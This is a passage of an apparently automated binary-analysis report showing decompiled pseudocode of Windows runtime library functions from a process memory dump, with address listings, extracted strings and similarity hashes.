																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0160FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x16c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x16c7b84 = _t75;
						_t73 = E015EEB70(_t134, 0x16c7b60);
						if( *0x16c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E015EFF60( *0x16c7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0160fab0
0x0160fab2
0x0160fab3
0x0160fab4
0x0160fabc
0x0160fac0
0x0160fb14
0x0160fb17
0x0160fac2
0x0160fac8
0x0160facd
0x0160fad3
0x0160fad3
0x0160fadd
0x0160fb18
0x0160fb1b
0x0160fb1d
0x0160fb1e
0x0160fb1f
0x0160fb20
0x0160fb21
0x0160fb22
0x0160fb23
0x0160fb24
0x0160fb25
0x0160fb26
0x0160fb27
0x0160fb28
0x0160fb29
0x0160fb2a
0x0160fb2b
0x0160fb2c
0x0160fb2d
0x0160fb2e
0x0160fb2f
0x0160fb3a
0x0160fb3b
0x0160fb3e
0x0160fb41
0x0160fb44
0x0160fb47
0x0160fb4a
0x0160fb4d
0x0160fb53
0x0164bdcb
0x0164bdcb
0x0160fb59
0x0160fb5b
0x0160fb5b
0x0160fb5e
0x0164bdd5
0x0164bdd8
0x00000000
0x0164bdda
0x00000000
0x0164bdda
0x0160fb64
0x0160fb64
0x0160fb64
0x0160fb67
0x0160fb6e
0x0160fb70
0x0160fb72
0x00000000
0x0160fb78
0x0160fb7a
0x0160fb7a
0x0160fb7d
0x0160fb80
0x0164bddf
0x0164bde1
0x00000000
0x0164bde3
0x00000000
0x0164bde3
0x0160fb86
0x0160fb86
0x0160fb86
0x0160fb8b
0x0160fb90
0x0160fb92
0x0160fb94
0x0160fb9a
0x0160fb9b
0x0160fba1
0x0164bde8
0x0164bdeb
0x0164bded
0x0164beb5
0x0164beb5
0x0164bebb
0x0164bebd
0x0164bec3
0x0164bed2
0x0164bedd
0x0164bedd
0x0164beed
0x00000000
0x0164bdf3
0x0164bdfe
0x0164be06
0x0164be0b
0x0164be0d
0x0164be0f
0x0164be14
0x0164be19
0x0164be20
0x0164be25
0x0164be27
0x0164be35
0x0164be39
0x0164be46
0x0164be4f
0x0164be54
0x0164be56
0x0164bef8
0x0164bef8
0x00000000
0x0164be5c
0x0164be5c
0x0164be60
0x00000000
0x0164be66
0x0164be66
0x0164be7f
0x0164be84
0x0164be87
0x0164be89
0x0164be8b
0x0164be99
0x0164be9d
0x0164bea0
0x0164beac
0x0164beaf
0x0164beb1
0x0164beb3
0x0164beb3
0x00000000
0x0164bea2
0x0164bea2
0x00000000
0x0164bea2
0x0164be8d
0x0164be8d
0x0164be92
0x00000000
0x0164be92
0x0164be8b
0x0164be60
0x0164be3b
0x0164be3b
0x0164be3e
0x00000000
0x0164be40
0x0164be40
0x0164be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0164be44
0x0164be3e
0x0164be29
0x0164be29
0x00000000
0x0164be29
0x0164be27
0x00000000
0x0160fba7
0x0160fba7
0x0160fbab
0x0164bf02
0x0160fbb1
0x0160fbb1
0x0160fbb8
0x0160fbbd
0x0160fbbd
0x0160fbbf
0x0160fbbf
0x0160fbc5
0x0160fbcb
0x0160fbf8
0x0160fbf8
0x0160fbfa
0x00000000
0x0160fc00
0x0160fc00
0x0160fc03
0x00000000
0x0160fc09
0x0160fc09
0x0160fc0f
0x0160fc15
0x0160fc23
0x0160fc23
0x0160fc25
0x0160fc27
0x0160fc75
0x0160fc7c
0x0160fc84
0x00000000
0x0160fc29
0x0160fc29
0x0160fc2d
0x0160fc30
0x0164bf0f
0x00000000
0x0160fc36
0x0160fc38
0x0160fc3b
0x0160fc41
0x0164bf17
0x0164bf19
0x0164bf48
0x0164bf4b
0x00000000
0x0164bf1b
0x0164bf22
0x0164bf24
0x0164bf26
0x00000000
0x0164bf2c
0x0164bf37
0x0164bf39
0x0164bf3b
0x00000000
0x0164bf41
0x0164bf41
0x0164bf41
0x0164bf41
0x0164bf45
0x00000000
0x0164bf45
0x0164bf3b
0x0164bf26
0x00000000
0x0160fc47
0x0160fc47
0x0160fc49
0x0160fcb2
0x0160fcb4
0x0160fcb6
0x0160fcdc
0x0160fcdc
0x00000000
0x0160fcb8
0x0160fcc3
0x0160fcc5
0x0160fcc7
0x00000000
0x0160fcc9
0x0160fcc9
0x0160fccd
0x00000000
0x0160fccd
0x0160fcc7
0x00000000
0x0160fc4b
0x0160fc4b
0x0160fc4e
0x0160fc4e
0x0160fc51
0x0160fc51
0x0160fc54
0x0160fc5a
0x0160fc5c
0x0160fc5f
0x0160fc61
0x0160fc63
0x0160fc65
0x0160fc67
0x0160fc6e
0x0160fc72
0x0160fc72
0x0160fc72
0x0160fc72
0x0160fc67
0x0160fc61
0x00000000
0x0160fc5a
0x0160fc49
0x0160fc41
0x0160fc30
0x0160fc27
0x0160fc03
0x0160fbcd
0x0160fbd3
0x0160fbd9
0x0160fbdc
0x0160fbde
0x0160fc99
0x0160fc9b
0x0160fc9d
0x0160fcd5
0x0160fcd5
0x0160fc89
0x0160fc89
0x00000000
0x0160fc9f
0x0160fc9f
0x0160fca3
0x00000000
0x0160fca3
0x00000000
0x0160fbe4
0x0160fbe4
0x0160fbe4
0x0160fbe4
0x0160fbe9
0x0160fbf2
0x00000000
0x0160fbf2
0x0160fbde
0x0160fbcb
0x0160fbab
0x0160fc8b
0x0160fc8b
0x0160fc8c
0x0160fb80
0x0160fb72
0x0160fb5e
0x0160fc8d
0x0160fc91
0x0160fadf
0x0160fadf
0x0160fae1
0x0160fae4
0x0160fae7
0x0160faec
0x0160faf8
0x0160fb00
0x0160fb07
0x0160fb0f
0x0160fb0f
0x0160fb07
0x00000000
0x0160faf8
0x0160fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0164BE0F

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: b4d062c79c06cf1b7a22815dd4f76495d1cecd571d87ce332345590de93a5e82
Instruction ID: b446f4467f78642aba6fddbbceb040b01f3c9227a9a6a2ff861532282bf3461d
Opcode Fuzzy Hash: b4d062c79c06cf1b7a22815dd4f76495d1cecd571d87ce332345590de93a5e82
Instruction Fuzzy Hash: D1A1C271A006068BEB3ADF68CC5577BB7A5BF88710F0445A9D9469B7C1DB30D9428B90

Uniqueness

Uniqueness Score: -1.00%

Function 015D2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E015D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x16c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x16c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E016197C0();
				}
				if( *0x16c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x16c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01601624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E015F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0166FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01619520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0160E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0162DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x16c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x16c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01619980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E016195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E015F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E015F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01657016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0166FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x16c5350;
							if(_t109 != 0x16c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0166FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01665720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x015d2d8a
0x015d2d8a
0x015d2d92
0x015d2d96
0x015d2d9e
0x015d2da0
0x015d2da3
0x015d2da5
0x015d2da8
0x015d2dab
0x015d2db2
0x0162f9aa
0x0162f9ab
0x0162f9ae
0x0162f9ae
0x015d2db8
0x015d2dc2
0x0162f9b9
0x0162f9be
0x0162f9bf
0x0162f9bf
0x015d2dcf
0x0162f9c9
0x015d2dd5
0x015d2dd5
0x015d2dd5
0x015d2dde
0x015d2de1
0x015d2e70
0x015d2e72
0x015d2e72
0x015d2de7
0x015d2deb
0x015d2e7c
0x015d2e83
0x015d2e85
0x015d2e8b
0x015d2e8d
0x015d2e92
0x015d2e92
0x015d2e85
0x015d2df1
0x015d2df7
0x015d2df9
0x015d2df9
0x015d2dfc
0x015d2dff
0x015d2e02
0x00000000
0x015d2e05
0x015d2e0c
0x0162f9d9
0x015d2e12
0x015d2e12
0x015d2e12
0x015d2e1a
0x0162f9e3
0x0162f9e9
0x0162f9f0
0x0162f9f6
0x0162f9f8
0x0162f9f8
0x0162f9f0
0x015d2e23
0x0162fa02
0x0162fa03
0x0162fa05
0x0162fa06
0x00000000
0x015d2e29
0x015d2e29
0x015d2e2e
0x015d2e34
0x015d2e3e
0x00000000
0x00000000
0x015d2e44
0x015d2e47
0x015d2e4d
0x00000000
0x00000000
0x015d2e4f
0x015d2e54
0x00000000
0x00000000
0x015d2e5a
0x015d2e5f
0x015d2e9a
0x015d2ea4
0x015d2ea5
0x015d2ea8
0x015d2eaf
0x015d2eb2
0x015d2eb5
0x0162fae9
0x0162faeb
0x0162faed
0x0162faef
0x0162faf7
0x0162faf8
0x0162fafd
0x0162faff
0x0162fb04
0x0162fb04
0x0162faff
0x015d2ec0
0x015d2ec4
0x015d2ec6
0x015d2ec8
0x0162fb14
0x0162fb18
0x0162fb1e
0x0162fb21
0x0162fb21
0x015d2ece
0x015d2ece
0x015d2ece
0x015d2ed7
0x015d2e61
0x015d2e63
0x0162fa6b
0x0162fa71
0x0162fa76
0x0162fa78
0x0162fa8a
0x0162fa7a
0x0162fa83
0x0162fa83
0x0162fa8f
0x0162fa91
0x0162fa97
0x0162fa9d
0x0162faa4
0x0162faaa
0x0162faaf
0x0162fab1
0x0162fac3
0x0162fab3
0x0162fabc
0x0162fabc
0x0162fac8
0x0162facb
0x0162fadf
0x0162fadf
0x0162facb
0x0162faa4
0x0162fa91
0x015d2e6f
0x015d2e6f
0x015d2e5f
0x0162fa13
0x0162fa15
0x0162fa17
0x0162fa1f
0x0162fa21
0x0162fa22
0x0162fa25
0x0162fa28
0x0162fa2f
0x0162fa2f
0x0162fa2a
0x0162fa2a
0x0162fa2a
0x0162fa31
0x0162fa34
0x0162fa36
0x0162fa3c
0x0162fa3e
0x0162fa41
0x0162fa43
0x0162fa45
0x0162fa45
0x0162fa41
0x0162fa3c
0x0162fa4a
0x0162fa4f
0x0162fa51
0x0162fa53
0x0162fa56
0x0162fa5b
0x0162fa5e
0x00000000
0x0162fa5e
0x015d2e23

Strings

RTL: Re-Waiting, xrefs: 0162FA4A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: f9c3b72477a09d49daa0dec30b9399a3ec9280defec0e8a4d0111009e2ca1e5a
Instruction ID: 2741c8f75cacb5ca830c1155255bf3a04c3268e3e189e91d7db9e346812d596d
Opcode Fuzzy Hash: f9c3b72477a09d49daa0dec30b9399a3ec9280defec0e8a4d0111009e2ca1e5a
Instruction Fuzzy Hash: 1C61DE31A00A55EFEB32DB6CCC80B7EBBB5FB44714F140AA9E9119B2C1CB7499018B91

Uniqueness

Uniqueness Score: -1.00%

Function 016A0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E016A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0169FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E016A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01619730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0169A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0169A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x16c8b04 >> 0x14) + (_v44 -  *0x16c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E015F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0169138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E015F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0168FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x16c8724 & 0x00000008) != 0) {
						E016952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E016A15B5(0x16c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x016a0eb7
0x016a0eb9
0x016a0ec0
0x016a0ec2
0x016a0ecd
0x016a105b
0x016a105b
0x016a1061
0x016a1066
0x016a1066
0x016a106b
0x016a1073
0x016a1073
0x016a0ed3
0x016a0ed6
0x016a0edc
0x016a0ee0
0x016a0ee7
0x016a0ef0
0x016a0ef5
0x016a0efa
0x016a0efc
0x016a0efd
0x016a0f03
0x016a0f04
0x016a0f06
0x016a0f07
0x016a0f09
0x016a0f0e
0x016a0f14
0x016a0f23
0x016a0f2d
0x016a0f34
0x016a0f34
0x016a0f14
0x016a0f52
0x00000000
0x00000000
0x016a0f58
0x016a0f73
0x016a0f74
0x016a0f79
0x016a0f7d
0x016a0f80
0x016a0f86
0x016a0fab
0x016a0fb5
0x016a0fc6
0x016a0fd1
0x016a0fe3
0x016a0fd3
0x016a0fdc
0x016a0fdc
0x016a0feb
0x016a1009
0x016a1009
0x016a1015
0x016a1027
0x016a1017
0x016a1020
0x016a1020
0x016a102f
0x016a103c
0x016a103c
0x016a1048
0x016a1050
0x016a1050
0x016a1055
0x00000000
0x016a1055
0x016a0f88
0x016a0f9e
0x016a0fa2
0x016a0fa9
0x00000000
0x00000000
0x00000000
0x016a0fa9
0x00000000

Strings

`, xrefs: 016A0F16

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: ad1bc63d23ee8a4ecfd01d27ec7bec2f223e9d41d52b5ce1436cd7aaafcf8e25
Instruction ID: dc385105b73d83469d571dbe4476f6bf66d2f0db42f3f898b79537b6f2062253
Opcode Fuzzy Hash: ad1bc63d23ee8a4ecfd01d27ec7bec2f223e9d41d52b5ce1436cd7aaafcf8e25
Instruction Fuzzy Hash: E4519D712043429FD725DF28DD84B2BBBE9EBC5614F44096CFA9697290DB70EC05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0160F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0160F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E015F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01619830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01619990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E016195D0();
							goto L11;
						} else {
							_t109 = L015F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0161F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E016195D0();
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0160f0d3
0x0160f0d9
0x0160f0e0
0x0160f0e7
0x0160f0f2
0x0160f0f4
0x0160f0f8
0x0160f100
0x0160f108
0x0160f10d
0x0160f115
0x0160f116
0x0160f11f
0x0160f123
0x0160f124
0x0160f12c
0x0160f130
0x0160f134
0x0160f13d
0x0160f144
0x0160f14b
0x0160f152
0x0164bab0
0x0164bab0
0x0160f158
0x0160f158
0x0160f15a
0x0160f160
0x0160f165
0x0160f166
0x0160f16f
0x0160f173
0x0164baa7
0x0164baa7
0x0164baab
0x00000000
0x0160f179
0x0160f18d
0x0160f191
0x0164baa2
0x00000000
0x0160f197
0x0160f19b
0x0160f1a2
0x0160f1a9
0x0160f1af
0x0160f1b2
0x0160f1b6
0x0160f1b9
0x0160f1c4
0x0160f1d8
0x0160f1df
0x0160f1e3
0x0160f1eb
0x0160f1ee
0x0160f1f4
0x0160f20f
0x0164bab7
0x0164babb
0x0164bacc
0x0164bad1
0x0160f215
0x0160f218
0x0160f226
0x0160f22b
0x00000000
0x0160f22b
0x0160f1f6
0x0160f1f6
0x0160f1f9
0x0160f1fb
0x0160f1fb
0x0160f1f4
0x0160f191
0x0160f173
0x0160f152
0x0160f203

Strings

@, xrefs: 0160F124

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 63267a839dc6a24441f050a36eabe93afc8f27478d34af8a83f89c6eb830fba9
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 4C51BC71204711AFC321DF29C840A6BBBF9FF88710F00892EFA9597690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01653540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01653540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x16cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01610BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01653706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0161FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01653540;
						E0161FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0162DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01660C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E016197C0();
					}
					return E0161B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01653971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01653884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0161FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01619650();
					if(_t81 >= 0) {
